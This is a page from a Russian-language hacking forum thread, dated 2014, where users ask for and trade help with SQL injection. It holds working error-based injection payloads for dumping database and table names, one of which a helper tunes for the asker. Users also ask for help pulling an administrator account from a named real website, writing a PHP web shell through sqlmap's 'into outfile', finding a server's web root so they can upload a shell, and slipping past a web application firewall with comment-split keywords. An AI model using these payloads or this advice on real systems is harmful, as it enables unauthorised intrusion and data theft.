HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2378 из 2438 « Первая < 13781878227823282368 2374 2375 2376 2377 2378 2379 2380 2381 2382 23882428 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23771  
Старый 30.08.2014, 17:20
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
Konqi, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос:

CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) --

Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'
 
Ответить с цитированием

  #23772  
Старый 30.08.2014, 17:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от billybonse  
billybonse said:
Konqi
, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос:
CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) --
Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'
CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
 
Ответить с цитированием

  #23773  
Старый 30.08.2014, 17:42
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
Спасибо, помогло! Кручу дальше!
 
Ответить с цитированием

  #23774  
Старый 30.08.2014, 20:03
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
где можно найти инфу про то какие браузеры какие симолы урл энкодят?

к примеру фф превращает ' в %27 а опера нет.

где найти инфу об этом?
 
Ответить с цитированием

  #23775  
Старый 31.08.2014, 09:13
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
помогите админа вытащить

http://www.grc.tomsk.ru/

GET vote%5B2%5D%5B%5D=7 - скуля

почему то дальше имени бд не идет.
 
Ответить с цитированием

  #23776  
Старый 01.09.2014, 19:34
yeti2
Guest
Сообщений: n/a
Провел на форуме:
24060

Репутация: 0
По умолчанию
Привилегия File, Dba - False

В sqlmap есть команда --sql-shell

sql-shell> Что дальше ? Не пойму с командами , как понял select MiniShell into outfile "/dir/shell.php"

Прошу помощи
 
Ответить с цитированием

  #23777  
Старый 01.09.2014, 23:56
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию
Код:
Code:
site.com/index.php?id=1+union+select+1,2,3+--+
Forbidden

You don't have permission to access /index.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Код:
Code:
site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+
[DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1

wtf?
 
Ответить с цитированием

  #23778  
Старый 02.09.2014, 22:58
yeti2
Guest
Сообщений: n/a
Провел на форуме:
24060

Репутация: 0
По умолчанию
Как узнать корневую папку до сайта?

Есть полные права , не могу залить шелл , не зная корневую папку
 
Ответить с цитированием

  #23779  
Старый 02.09.2014, 23:29
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию
Цитата:
Сообщение от erwap  
erwap said:
Код:
Code:
site.com/index.php?id=1+union+select+1,2,3+--+
Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Код:
Code:
site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+
[DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1
wtf?
Not WTF - WAF.

Цитата:
Сообщение от None  
Как узнать корневую папку до сайта?
Есть полные права , не могу залить шелл , не зная корневую папку
1) Перебор

2) Чтение конфигов, раз есть file_priv

3) Выбивание ошибок из скриптов

4) Гугление по варнингам\еррорам\нотисам для site:site.com
 
Ответить с цитированием

  #23780  
Старый 03.09.2014, 00:06
yeti2
Guest
Сообщений: n/a
Провел на форуме:
24060

Репутация: 0
По умолчанию
Цитата:
Сообщение от madhatter  
madhatter said:
1) Перебор
2) Чтение конфигов, раз есть file_priv
3) Выбивание ошибок из скриптов
4) Гугление по варнингам\еррорам\нотисам для site:site.com
Какие именно конфиги?
 
Ответить с цитированием
Ответ
Страница 2378 из 2438 « Первая < 13781878227823282368 2374 2375 2376 2377 2378 2379 2380 2381 2382 23882428 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ